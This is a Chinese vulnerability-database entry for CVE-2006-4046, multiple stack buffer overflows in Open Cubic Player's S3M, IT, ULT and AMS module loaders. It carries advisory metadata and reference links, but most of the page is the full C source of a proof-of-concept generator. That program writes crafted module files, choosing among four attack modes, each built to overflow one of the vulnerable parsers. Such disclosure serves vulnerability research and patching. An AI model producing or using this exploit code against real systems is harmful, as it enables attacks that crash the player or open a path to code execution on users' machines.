Open Cubic Player多个缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110719 漏洞类型 缓冲区溢出
发布时间 2006-07-31 更新时间 2006-08-14
CVE编号 CVE-2006-4046 CNNVD-ID CNNVD-200608-131
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2094
https://cxsecurity.com/issue/WLB-2006080058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-131
|漏洞详情
Windows操作系统下的OpenCubicPlayer2.6.0pre6及早期版本,和Linux/BSD下的0.1.10_rc5及早期版本中存在多个堆栈缓冲区溢出漏洞,远程攻击者可借助:(1)mpLoadS3M函数处理的超大.S3M文件,(2)itplayerclass::module::load函数处理的特制的.IT文件,(3)mpLoadULT函数处理的特制的.ULT文件,或(4)mpLoadAMS函数处理的特制的.AMS文件,来执行任意代码。
|漏洞EXP
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>



#define VER         "0.1"
#define POCNAME     "proof-of-concept"



void fwbof(FILE *fd, int len, int chr);
void fwi08(FILE *fd, int num);
void fwi16(FILE *fd, int num);
void fwi32(FILE *fd, int num);
void fwstx(FILE *fd, uint8_t *str, int size);
void fwmem(FILE *fd, uint8_t *data, int size);
void std_err(void);



#pragma pack(1)

typedef struct {
    int8_t      name[28];
    uint8_t     kennung;
    uint8_t     typ;
    uint8_t     dummy[2];
    uint16_t    ordnum;
    uint16_t    insnum;
    uint16_t    patnum;
    uint16_t    flags;
    uint16_t    cwtv;
    uint16_t    ffi;
    int8_t      scrm[4];
    uint8_t     gv;
    uint8_t     is;
    uint8_t     it;
    uint8_t     mv;
    uint8_t     uc;
    uint8_t     dp;
    uint8_t     dummy2[8];
    uint16_t    special;
    uint8_t     chanset[32];
} s3m_t;

typedef struct {
    uint8_t     sign[4];    // IMPM
    uint8_t     name[26];
    uint16_t    PHiligt;
    uint16_t    OrdNum;
    uint16_t    InsNum;
    uint16_t    SmpNum;
    uint16_t    PatNum;
    uint16_t    Cwtv;
    uint16_t    Cmwt;
    uint16_t    Flags;
    uint16_t    Special;
    uint8_t     GV;
    uint8_t     MV;
    uint8_t     IS;
    uint8_t     IT;
    uint8_t     Sep;
    uint8_t     PWD;
    uint16_t    MsgLgth;
    uint32_t    MsgOff;
    uint32_t    Reserved;
} it_t;

#define AMSNAMELEN  8       // < 128
typedef struct {
    uint8_t     ins;
    uint16_t    pat;
    uint16_t    pos;
    uint16_t    bpm;
    uint8_t     speed;
    uint8_t     defchn;
    uint8_t     defcmd;
    uint8_t     defrow;
    uint16_t    flags;
} ams_t;

#pragma pack()



int main(int argc, char *argv[]) {
    FILE    *fd;
    s3m_t   s3m;
    it_t    it;
    ams_t   ams;
    int     i,
            j,
            tmp,
            attack;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <output_file>\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow in mpLoadS3M        (*.S3M)\n"
            " 2 = buffer-overflow in itload.cpp       (*.IT)\n"
            " 3 = buffer-overflow in mpLoadULT        (*.ULT)\n"
            " 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n"
            "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);
    fname  = argv[2];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    if(attack == 1) {

        memset(&s3m, 0, sizeof(s3m));
        strncpy(s3m.name,  POCNAME, sizeof(s3m.name));
        s3m.kennung = 0x1a;
        s3m.typ     = 16;
        s3m.ordnum  = 800;
        memcpy(s3m.scrm, "SCRM", 4);

        fwrite(&s3m, sizeof(s3m), 1, fd);

        for(i = 0; i < s3m.ordnum - 1; i++) fputc('a', fd);
        fputc(0, fd);                                   // for forcing "return errFormMiss"

    } else if(attack == 2) {

        memset(&it, 0, sizeof(it));
        memcpy(it.sign, "IMPM", 4);
        strncpy(it.name, POCNAME, sizeof(it.name));
        it.Cmwt   = 0x200;
        it.OrdNum = 1000;                               // buffer-overflow
//        it.InsNum = 200;                                // buffer-overflow

        fwrite(&it, sizeof(it), 1, fd);

        for(i = 0; i < 64;        i++) fwi08(fd, 0);
        for(i = 0; i < 64;        i++) fwi08(fd, 0);
        for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a');
        for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a');

    } else if(attack == 3) {

        fwmem(fd, "MAS_UTrack_V00", 14);
        fwi08(fd, 3 + '1');
        fwstx(fd, POCNAME, 32);
        fwi08(fd, 0);                                   // msglen
        fwi08(fd, 0);                                   // insnum
        fwbof(fd, 256, 0);                              // orders
        tmp = 0x7f;
        fwi08(fd, tmp);                                 // chnn
        fwi08(fd, 0);                                   // patn
        fwbof(fd, tmp, 'a');                            // buffer-overflow

            // possible heap overflow with chbp, patlength = 0

    } else if(attack == 4) {

        fwmem(fd, "AMShdr\x1A", 7);                     // sig
        fwi08(fd, AMSNAMELEN);                          // sig[7]
        fwbof(fd, AMSNAMELEN, 'a');                     // name
        fwi16(fd, 0x202);                               // filever

        memset(&ams, 0, sizeof(ams));
        ams.ins = 1;

        fwrite(&ams, sizeof(ams), 1, fd);

        for(j = 0; j < ams.ins; j++) {
            fwi08(fd, AMSNAMELEN);                      // namelen
            fwbof(fd, AMSNAMELEN, 'a');                 // name
            fwi08(fd, 1);                               // smpnum

            fwbof(fd, 120, 0);                          // samptab

            for(i = 0; i < 3; i++) {                    // envs
                tmp = 0xff;
                fwi08(fd, 0);                           // speed
                fwi08(fd, 0);                           // sustain
                fwi08(fd, 0);                           // loopstart
                fwi08(fd, 0);                           // loopend
                fwi08(fd, tmp);                         // points
                fwbof(fd, tmp * 3, 'a');
            }
        }

    } else {
        printf("\nError: you must specify the right attack number\n");
    }

    fclose(fd);
    printf("- finished\n");
    return(0);
}



void fwbof(FILE *fd, int len, int chr) {
    while(len--) fputc(chr, fd);
}



void fwi08(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
}



void fwi16(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
}



void fwi32(FILE *fd, int num) {
    fputc((num      ) & 0xff, fd);
    fputc((num >>  8) & 0xff, fd);
    fputc((num >> 16) & 0xff, fd);
    fputc((num >> 24) & 0xff, fd);
}



void fwstx(FILE *fd, uint8_t *str, int size) {
    int     i;

    for(i = 0; str[i] && (i < size); i++) {
        fputc(str[i], fd);
    }
    for(; i < size; i++) {
        fputc(0, fd);
    }
}



void fwmem(FILE *fd, uint8_t *data, int size) {
    fwrite(data, size, 1, fd);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2006-07-31]
|参考资料

来源:XF
名称:opencubicplayer-mploadams-bo(28106)
链接:http://xforce.iss.net/xforce/xfdb/28106
来源:XF
名称:opencubicplayer-mploadult-bo(28105)
链接:http://xforce.iss.net/xforce/xfdb/28105
来源:XF
名称:opencubicplayer-itplayerclassmoduleload-bo(28104)
链接:http://xforce.iss.net/xforce/xfdb/28104
来源:XF
名称:opencubicplayer-mploads3m-bo(28103)
链接:http://xforce.iss.net/xforce/xfdb/28103
来源:BID
名称:19262
链接:http://www.securityfocus.com/bid/19262
来源:BUGTRAQ
名称:20060731MultiplevulnerabilitiesinOpenCubicPlayer2.6.0pre6/0.1.10_rc5
链接:http://www.securityfocus.com/archive/1/archive/1/441730/100/100/threaded
来源:VUPEN
名称:ADV-2006-3078
链接:http://www.frsirt.com/english/advisories/2006/3078
来源:SECTRACK
名称:1016611
链接:http://securitytracker.com/id?1016611
来源:SECUNIA
名称:21267
链接:http://secunia.com/advisories/21267
来源:MISC
链接:http://aluigi.altervista.org/adv/ocpbof-adv.txt
来源:SREASON
名称:1349
链接:http://securityreason.com/securityalert/1349
来源:MILW0RM
名称:2094
链接:http://milw0rm.com/exploits/2094